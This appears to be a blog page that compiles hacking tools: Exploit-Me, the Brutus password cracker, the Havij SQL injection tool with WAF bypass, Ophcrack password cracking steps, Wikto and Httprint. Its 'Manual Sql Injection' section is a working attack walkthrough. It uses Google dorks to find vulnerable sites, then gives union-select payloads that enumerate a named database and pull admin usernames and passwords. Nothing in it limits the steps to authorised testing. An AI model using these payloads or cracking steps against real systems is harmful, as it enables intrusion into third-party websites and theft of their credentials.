Exploit-Me

Exploit-Me is a suite of Firefox web application security testing tools designed to be lightweight and easy to use.


The Exploit-Me series was originally introduced at the SecTor conference in Toronto. The slides for the presentation are available for download. Along with this SecTor is making the audio of the talk available.


XSS-Me
Cross-Site Scripting (XSS) is a common flaw found in todays web applications. XSS flaws can cause serious damage to a web application. Detecting XSS vulnerabilities early in the development process will help protect a web application from unnecessary flaws. XSS-Me is the Exploit-Me tool used to test for reflected XSS vulnerabilities.


· Download XSS-Me Now!
· XSS-Me 0.4 release notes
· Get the source
· Read the FAQ to find out more
· Extended XSS string set


SQL Inject-Me
SQL Injection vulnerabilites can cause a lot of damage to a web application. A malicious user can possibly view records, delete records, drop tables or gain access to your server. SQL Inject-Me is the Exploit-Me tool used to test for SQL Injection vulnerabilities.


· Download SQL Inject-Me Now!
· SQL Inject-Me 0.4 release notes
· Get the source
· Read the FAQ to find out more


Access-Me
Access vulnerabilites in an application can allow an attacker to access resources without being authenticated. Access-Me is the Exploit-Me tool used to test for Access vulnerabilities.
· Download Access-Me Now!
· Access-Me 0.2 release notes
· Get the source
· Read the FAQ to find out more


Website - Security Compass

Remote Password Cracker - BRUTUS

Brutus is one of the fastest, most flexible remote password crackers you can get your hands on – it’s also free.
It is available for Windows 9x, NT and 2000, there is no UNIX version available although it is a possibility at some point in the future.
Brutus was first made publicly available in October 1998.
Development continues so new releases will be available in the near future.

Features :
Brutus version AET2 is the current release and includes the following authentication types :
* HTTP (Basic Authentication)
* HTTP (HTML Form/CGI)
* POP3
* FTP
* SMB
* Telnet

Other types such as IMAP, NNTP, NetBus etc are freely downloadable from this site and simply imported into your copy of Brutus. You can create your own types or use other peoples.

The current release includes the following functionality :
* Multi-stage authentication engine
* 60 simultaneous target connections
* No username, single username and multiple username modes
* Password list, combo (user/password) list and configurable brute force modes
* Highly customizable authentication sequences
* Load and resume position
* Import and Export custom authentication types as BAD files seamlessly
* SOCKS proxy support for all authentication types
* User and password list generation and manipulation functionality
* HTML Form interpretation for HTML Form/CGI authentication types
* Error handling and recovery capability inc. resume after crash/failure.

 Download Brutus

Havij v1.15 Advanced SQL Injection

Havij v1.15

 

Havij is an automated SQL Injection tool that helps penetration testers to find and exploit SQL Injection vulnerabilities on a web page.

It can take advantage of a vulnerable web application. By using this software user can perform back-end database fingerprint, retrieve DBMS users and  password hashes, dump tables and columns, fetching data from the database, running SQL  statements and even accessing the underlying file system and executing commands on the  operating system.

The power of Havij that makes it different from similar tools is its injection methods. The success rate is more than 95% at injectiong vulnerable targets using Havij.

The user friendly GUI (Graphical User Interface) of Havij and automated settings and detections makes it easy to use for everyone even amateur users.

What's New?

• Webknight WAF bypass added.
• Bypassing mod_security made better
• Unicode support added
• A new method for tables/columns extraction in mssql
• Continuing previous tables/columns extraction made available
• Custom replacement added to the settings
• Default injection value added to the settings (when using %Inject_Here%)
• Table and column prefix added for blind injections
• Custom table and column list added.
• Custom time out added.
• A new md5 cracker site added
• bugfix: a bug releating to SELECT command
• bugfix: finding string column
• bugfix: getting multi column data in mssql
• bugfix: finding mysql column count
• bugfix: wrong syntax in injection string type in MsAccess
• bugfix: false positive results was removed
• bugfix: data extraction in url-encoded pages
• bugfix: loading saved projects
• bugfix: some errors in data extraction in mssql fixed.
• bugfix: a bug in MsAccess when guessing tables and columns
• bugfix: a bug when using proxy
• bugfix: enabling remote desktop bug in windows server 2008 (thanks to pegasus315)
• bugfix: false positive in finding columns count
• bugfix: when mssql error based method failed
• bugfix: a bug in saving data
• bugfix: Oracle and PostgreSQL detection

How to use

This tool is for exploiting SQL Injection bugs in web application.

For using this tool you should know a little about SQL Injections.

Enter target url and select http method then click Analyze.

Note: Try to url be valid input that returns a normal page not a 404 or error page.

Download Havij Free Version

Havij v1.15 Free

Downlaod Help (pdf format)

Downlaod Help (chm format)

Visit  Official Site for Information–

http://itsecteam.com/en/projects/project1.htm

OphCrack - Window Password Recovery Tool

Ophcrack is a open source program that is used to cracks Windows passwords with the help of LM hashses (rainbow tables). 

If There is any problem to open your window password or you are failed to open it due to any reason. you can recover or crack this password with the help of Ophcrack

Ophcrack is a free open source program. It is used to cracks windows passwords by using L M hashes through rainbow tables. 

Ophcrack can crack many password within a few second. This are given free to crack passwords of window XP , Window Vista by the developers. 

Ophcrack is one of the most effective password hack tools .It runs in Windows, Mac and Linux installations and it is useful for cracking any type of window password. You can say that it is the window password recovery tool which is available free to download.

Free Download Ophcrack is available in two Windows XP tables, one small and one fast, and one Windows Vista table. 

Ophcrack is also available for Life CD distribution. It automates and regulates the retrieval, cracking and decrypting of password on Window System. 

Ophcrack's Live CD Distribution are built with SliTaz GNU/Linux. Download Ophcrack is in the form of single ISO file. It can download automatically.

Ophcrack supplies rainbow tables which is free to use. Rainbow table is a list of guessed password which help you to recover your password. It is included in the Live CD and retrieved automatically from the Windows executable files. 

Download Ophcrack from Ophcrack website as it is free and most useful when you forget your password. 

Download Ophcrack

Step 1: The first thing we will need to do is download the CD image from Ophcrack’s website.

There are two options to download, XP or Vista, so make sure you grab the right one. The Vista download works with Windows Vista or Windows 7, and the only difference between XP and Vista is the “tables” Ophcrack uses to determine the password.

Step 2: Once the .iso file is downloaded, Burn the Ophcrack ISO image file to a CD 

Step 3: Restart your computer from the burned CD. 

 

Step 4: Ophcrack Live CD will initialize by itself when restarts.

Step 5: The logo screen should appear, at which you should hit Enter.

Step 6: Once the Ophcrack live CD system loading is done, select the user account you wish to recover password for, and click launch.

Step 7: Depending on the speed of your system, the cracker will go on; your password will eventually be displayed in the "NT Pwd" column.

 

 When you forgot Windows 7 password, you can easily bypass the forgotten password and regain access to your computer with these methods.

Ophcrack 3.4.0 released

 Ophcrack 3.4.0 released on April 27, 2012

After almost three years without news, here comes the version 3.4.0 of ophcrack. This will probably be the final release in the 3.x branch.

It adds the support of the soon to be released XP flash and Vista eight XL tables. On Windows it also adds the support of dumping the hashes through samdump2 live using NTFS low-level access to the locked files.
A new LiveCD will follow soon hopefully. Stay tuned!

What is Ophcrack

Ophcrack is a free open source (GPL licensed) program that cracks Windows passwords by using LM hashes through rainbow tables. The program includes the ability to import the hashes from a variety of formats, including dumping directly from the SAM files of Windows. On most computers, ophcrack can crack most passwords within a few minutes.^[1]

Rainbow tables for LM hashes of alphanumeric passwords are provided for free by the developers. By default, ophcrack is bundled with tables that allows it to crack passwords no longer than 14 characters using only alphanumeric characters. Available for free download are two Windows XP tables, one small and one fast, and one Windows Vista table.^[2]

Objectif Sécurité has even larger tables for purchase, intended for professional use.^[3] Larger rainbow tables contain LM hashes of passwords with all printable characters, including symbols and spaces, and are available for purchase.^[2]

Ophcrack is also available as Live CD distributions which automate the retrieval, decryption, and cracking of passwords from a Windows system. One Live CD distribution is available for Windows XP and lower, as well as another for Windows Vista and Windows 7.^[4] The Live CD distributions of ophcrack are built with SliTaz GNU/Linux.

Starting with version 2.3, Ophcrack also cracks NTLM hashes. This is necessary if the generation of the LM hash is disabled (this is default for Windows Vista), or if the password is longer than 14 characters (in which case the LM hash is not stored).

Ophcrack is a free Windows password cracker based on rainbow tables. It is a very efficient implementation of rainbow tables done by the inventors of the method. It comes with a Graphical User Interface and runs on multiple platforms.

Features :-

• Runs on Windows, Linux/Unix, Mac OS X, …
• Cracks LM and NTLM hashes.
• Free tables available for Windows XP and Vista.
• Brute-force module for simple passwords.
• Audit mode and CSV export.
• Real-time graphs to analyze the passwords.
• Live CD available to simplify the cracking.
• Loads hashes from encrypted SAM recovered from a Windows partition, Vista included.
• Free and open source software (GPL).     
• Download Ophcrack LiveCD
  The latest version of ophcrack LiveCD is 2.3.1 (including ophcrack 3.3.1)

 

Source -

http://ophcrack.sourceforge.net/ 

http://en.wikipedia.org/wiki/Ophcrack

Manual Sql Injection

 Manual Sql Injection Attack

SQL injection attack consists of insertion or "injection" of a SQL query via the input data from the client to the application. A successful SQL injection exploit can read sensitive data from the database, modify database data (Insert/Update/Delete), execute administration operations on the database (such as shutdown the DBMS), recover the content of a given file present on the DBMS file system and in some cases issue commands to the operating system. SQL injection attacks are a type of injection attack, in which SQL commands are injected into data-plane input in order to effect the execution of predefined SQL commands.

Need to find out a sql vulnerable site : 
To find a sql vulnerable website we will use some google Dorks from following:

inurl:index.php?id=  

inurl:trainers.php?id= 

inurl:buy.php?category= 

inurl:article.php?ID=

inurl:play_old.php?id=

inurl:declaration_more.php?decl_id=

inurl:Pageid= 

Step 1: Finding Vulnerable Link -

www.site.com/news.php?id=3

Add ' After id=3

If SQL Syntax Error is shown or blank page then site is Vulnerable to SQL Injection.

Step 2: Finding Vulnerable Columns -

www.site.com/news.php?id=3

order by 8 --

if again error is shown or blank page occured then

Vulnerable columns are 7.

Step 3: Finding Number of Vulnerable Columns:

www.site.com/news.php?id=3

union all select 1,2,3,4,5,6,7 --

if number 2 is shown then this column can give us database,tables & columns

Step 4 Finding Database

union all select 1,database(),3,4,5,6,7 --

chennaisilks

Step 5: Finding Table Names:

www.site.com/news.php?id=3

union all select 1,table_name,3,4,5,6 from  information_schema.tables wheretable_schema='chennaisilks' --

Step 6: Finding Column Names:

www.site.com/news/php?id=3

union all select 1,column_name,3,4,5,6,7

from information_schema.columns where

table_schema='blogtest' --

Admin table is admin

Admin Columns are

admin_id

user_id

admin_pwd

admin_email

admin_last_login

admin_ip

Step 6: Finding Admin username & password:

www.site.com/news.php?id=3

union all select 1,user_id,3,4,5,6,7 from admin --

union all select 1,admin_pwd,3,4,5,6,7 from admin --

Source 

howtohackwebsite.com

Wikto - Nikto for Windows

Wikto - Nikto for Windows with some extra features.

Author

Roelof Temmingh
Gareth Phillips < gareth(at)sensepost(dot)com >
Ian de Villiers < ian(at)sensepost(dot)com >

License, version & release date

License : GPLv3
Version : 2.1.0.0
Release Date : 2008/12/15

Description

Wikto is Nikto for Windows - but with a couple of fancy extra features including Fuzzy logic error code checking, a back-end miner, Google assisted directory mining and real time HTTP request/response monitoring. Wikto is coded in C# and requires the .NET framework.

Wikto to quickly and easily perform web server assessments.

Before we start we need to know what Wikto does and what it does not do. Wikto is not a web application scanner. It is totally unaware of the application (if any) that’s running on the web site.So – Wikto will not look for SQL injection problems, authorization problems etc. on a web site. It is also not a network level scanner – so it won’t try to find open ports, or see if the web site is properly firewalled. Wikto rather operates between these two levels – it tries to, for instance, find interesting directories and files on the web site, it looks for sample scripts that can be abused or finds known vulnerabilities in the web server implementation itself. Oh – and Wikto is not just Nikto for Windows. The Nikto scan is only of its many functions (and it does the Nikto scans totally different than Nikto does).

Requirements

WinHTTrack (www.httrack.com)
HTTprint (www.net-square.com)
.Net Framework

Additional Resources

http://www.sensepost.com/cms/resources/labs/tools/pentest/wikto/using_wikto.pdf


More information with Installation 
http://searchsecurity.techtarget.com/tip/Screencast-How-to-use-Wikto-for-Web-server-assessment

Httprint Web Server Fingerprinting tool

Httprint

Easy to use Gui Interface OS fingerprinting Tool for Pen tester.

Introduction

httprint is a web server fingerprinting tool. It relies on web server characteristics to accurately identify web servers, despite the fact that they may have been obfuscated by changing the server banner strings, or by plug-ins such as mod_security or servermask. httprint can also be used to detect web enabled devices which do not have a server banner string, such as wireless access points, routers, switches, cable modems, etc. httprint uses text signature strings and it is very easy to add signatures to the signature database.

More details on how httprint works can be found in the Introduction to HTTP fingerprinting paper. It is printer-friendly.

Features

• Identification of web servers despite the banner string and any other obfuscation. httprint can successfully identify the underlying web servers when their headers are mangled by either patching the binary, by modules such as mod_security.c or by commercial products such as ServerMask. Click here to see an example of how httprint detects disguised servers.
• Inventorying of web enabled devices such as printers, routers, switches, wireless access points, etc. Click on the sample HTML report.
• Customisable web server signature database. To add new signatures, simply cut and paste the httprint output against unknown servers into the signatures text file.
• Confidence Ratings. httprint now picks the best matches based on confidence ratings, derived using a fuzzy logic technique, instead of going by the highest weight. More details on the significance of confidence ratings can be found in section 8.4 of the Introduction to HTTP fingerprinting paper.
• [new] Multi-threaded engine. httprint v301 is a complete re-write, featuring a multi-threaded scanner, to process multiple hosts in parallel. This greatly saves scanning time. *multi-threading is not yet supported in the FreeBSD version.
• [new] SSL information gathering. httprint now gathers SSL certificate information, which helps you identify expired SSL certificates, ciphers used, certificate issuer, and other such SSL related details.
• [new] Automatic SSL detection. httprint can detect if a port is SSL enabled or not, and can automatically switch to SSL connections when needed.
• Automatic traversal of HTTP 301 and 302 redirects. Many servers who have transferred their content to other servers send a default redirect response towards all HTTP requests. httprint now follows the redirection and fingerprints the new server pointed to. This feature is enabled by default and can be turned off, if needed.
• Ability to import web servers from nmap network scans. httprint can import nmap's xml output files.
• Reports in HTML, CSV and XML formats.
• Available on Linux, Mac OS X, FreeBSD (command line only) and Win32 (command line and GUI).

·         Downloads

·         httprint 301: (released on 22/12/05)

platform	ver	url	md5
Win32 GUI and cmd line	301	[download]	a66408308c3f540030bbb0d59716b032
Linux	301	[download]	af53704de9c1851bd439cbe3fab3e0ad
Mac OS X	301	[download]	6b188cd60df6eca5409694fa40859f0d
FreeBSD	301	[download]	d5efd9463f671ce92f50ce3222f1774e

Revision History   

Usage

·         The Win32 GUI version usage is quite straightforward. The Win32, Linux, FreeBSD and Mac OS X command line version usage syntax is given here.

Source 

http://net-square.com/httprint/